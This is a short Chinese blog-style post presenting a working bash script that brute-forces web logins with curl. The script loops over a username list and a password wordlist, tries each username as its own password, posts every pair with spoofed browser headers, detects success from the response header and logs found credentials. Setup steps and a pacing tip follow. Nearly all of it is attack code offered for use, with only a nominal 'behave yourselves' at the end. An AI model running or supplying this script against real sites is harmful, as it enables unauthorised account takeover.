使用CURL进行蛮力密码破解
先上脚本
#!/usr/bin/env bash
USERCOUNT=$(wc -l user.txt | cut -d' ' -f1)
PWDCOUNT=$(wc -l password.txt | cut -d' ' -f1)
for ((i=1; i<=$USERCOUNT; i++)); do
USERNAME=`sed -n $i'p' user.txt`
PASSWORD=$USERNAME
echo "[$i][-]username=$USERNAME, password=$PASSWORD"
echo ""
curl 'https://localhost/loginurl' -H 'Connection: keep-alive' -H 'Host: localhost' -H 'Referer: https://localhost/index.jsp' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0' -H 'Content-Type: application/x-www-form-urlencoded' --data "username=$USERNAME&password=$PASSWORD" -D ./temp
cat ./temp
FOUND=`grep 'https://localhost/loginsuccess' ./temp`
if [ "$FOUND" != "" ]; then
echo 'FOUND!'
cat >> hit.txt <<EOS
username=$USERNAME, password=$PASSWORD
EOS
continue
fi
echo 'sleep 2 seconds.'
echo ''
sleep 2
for ((j=1; j<=$PWDCOUNT; j++)); do
PASSWORD=`sed -n $j'p' password.txt`
echo "[$i][$j]username=$USERNAME, password=$PASSWORD"
echo ""
curl 'https://localhost/loginurl' -H 'Connection: keep-alive' -H 'Host: localhost' -H 'Referer: https://localhost/index.jsp' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0' -H 'Content-Type: application/x-www-form-urlencoded' --data "username=$USERNAME&password=$PASSWORD" -D ./temp
cat ./temp
FOUND=`grep 'https://localhost/loginsuccess' ./temp`
if [ "$FOUND" != "" ]; then
echo 'FOUND!'
cat >> hit.txt <<EOS
username=$USERNAME, password=$PASSWORD
EOS
break
fi
echo 'sleep 2 seconds.'
echo ''
sleep 2
done
echo 'sleep 10 seconds.'
echo ''
sleep 10
done
将用户名列表保存为unix风格的user.txt
将密码列表保存为unix风格的password.txt
调整时间间隔
在curl返回的ResponseHeader里查找登录成功的标记(*关键)
开跑吧
本来是直接将ResponseHeader直接输出到/dev/stdout后搜索的
FOUND=`curl blabla -D /dev/stdout | grep 'https://localhost/loginsuccess'`
但不能直接看到ResponseHeader还是不太踏实Orz
大家请自重
春日戀歌好棒,好喜歡…thk’s